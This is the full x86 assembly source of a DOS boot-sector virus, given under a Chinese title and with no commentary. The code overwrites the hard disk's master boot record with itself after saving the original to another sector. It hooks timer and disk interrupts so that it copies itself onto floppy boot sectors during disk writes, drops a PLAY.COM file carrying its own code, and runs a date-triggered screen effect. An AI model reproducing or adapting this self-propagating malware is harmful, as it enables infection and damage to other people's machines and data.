DOS环境下的一个引导型病毒

CSEG SEGMENT ASSUME CS:CSEG BEGIN: MOV AX,CS CMP AX,0 JZ START JMP FILE ;********************************** DATA DATE DB 00H PZ DB 77H TIME DW 200H JMPA DW 7C00H DW 0000H JMPN DW OFFSET NEXT DW 0020H FN DB 'PLAY.COM',0 ;************************************ START: XOR AX,AX MOV DS,AX MOV SS,AX MOV ES,AX MOV SP,7C00H MOV AX,DS:[20H] ;SAVE INT 8H MOV DS:[180H],AX MOV AX,DS:[22H] MOV DS:[182H],AX MOV SI,SP MOV DI,0200H MOV CX,0200H CLD REP MOVSB MOV BX,OFFSET JMPN+7C00H JMP DWORD PTR CS:[BX] NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H MOV DS:[20H],AX MOV AX,0020H MOV DS:[22H],AX MOV BX,0600H MOV AX,0201H MOV CX,0001H MOV DX,0080H INT 13H CMP BYTE PTR ES:[PZ+0600H],077H JZ NC MOV AX,0301H MOV CX,0017H MOV DX,0080H INT 13H MOV SI,0200H MOV DI,0600H MOV CX,0200H CLD REP MOVSB MOV AX,0301H MOV CX,0001H MOV DX,0080H INT 13H NC: MOV BX,7C00H MOV AX,0201H MOV CX,0017H MOV DX,0080H INT 13H MOV AH,04H INT 1AH MOV CS:[DATE],DL MOV BX,OFFSET JMPA JMP DWORD PTR CS:[BX] ;***********************************RUN HD BOOTER PRG NEW08: PUSH AX PUSH DS DEC CS:[TIME] JNZ I08 XOR AX,AX MOV DS,AX MOV AX,DS:[4CH] MOV DS:[184H],AX MOV AX,DS:[4EH] MOV DS:[186H],AX MOV AX,OFFSET GR ;MODI INT 8H MOV DS:[20H],AX MOV AX,OFFSET NEW13 MOV DS:[4CH],AX MOV AX,OFFSET NEWF MOV DS:[94H],AX MOV AX,0020H MOV DS:[22H],AX MOV DS:[4EH],AX MOV DS:[96H],AX MOV CS:[TIME],200H I08: POP DS POP AX INT 60H IRET ;*************************************** NEW13: CMP AH,02H JZ CNE CMP AH,03H JNZ I13 CMP DL,00H JNZ CNE PUSH AX PUSH BX PUSH CX PUSH DX PUSH ES PUSH CS POP ES MOV AX,0301H XOR BX,BX MOV CX,0001H MOV DX,BX INT 61H POP ES POP DX POP CX POP BX POP AX JMP I13 CNE: CMP DX,0080H JNZ I13 CMP CX,0001H JNZ I13 MOV CX,0017H I13: INT 61H IRET ;******************************************* NEWF: PUSH CS POP DS MOV DX,OFFSET FN MOV CX,00000001B MOV AH,3CH INT 21H MOV BX,AX MOV AH,40H MOV CX,400H XOR DX,DX INT 21H MOV AH,3EH INT 21H MOV AX,0003H INT 10H JMP NCF GR: PUSH AX PUSH BX PUSH CX MOV AX,0900H MOV CX,0001H CMP CS:[DATE],15H JZ GR1 MOV BX,111B GR1: INT 10H NG: POP CX POP BX POP AX INT 60H IRET ;************************************ FILE: PUSH CS POP ES XOR AX,AX MOV DS,AX CMP BYTE PTR DS:[200H+PZ],77H JZ NCF MOV AH,77H MOV DS:[200H+PZ],AH MOV BX,0300H MOV AX,0201H MOV CX,0001H MOV DX,0080H INT 13H MOV AX,0301H MOV CX,0017H MOV DX,0080H INT 13H PUSH CS POP DS MOV SI,0100H MOV DI,BX MOV CX,01B0H ;CX 1B0H CLD REP MOVSB MOV AX,0301H MOV CX,0001H MOV DX,0080H INT 13H NCF: MOV AH,4CH INT 21H CSEG ENDS END BEGIN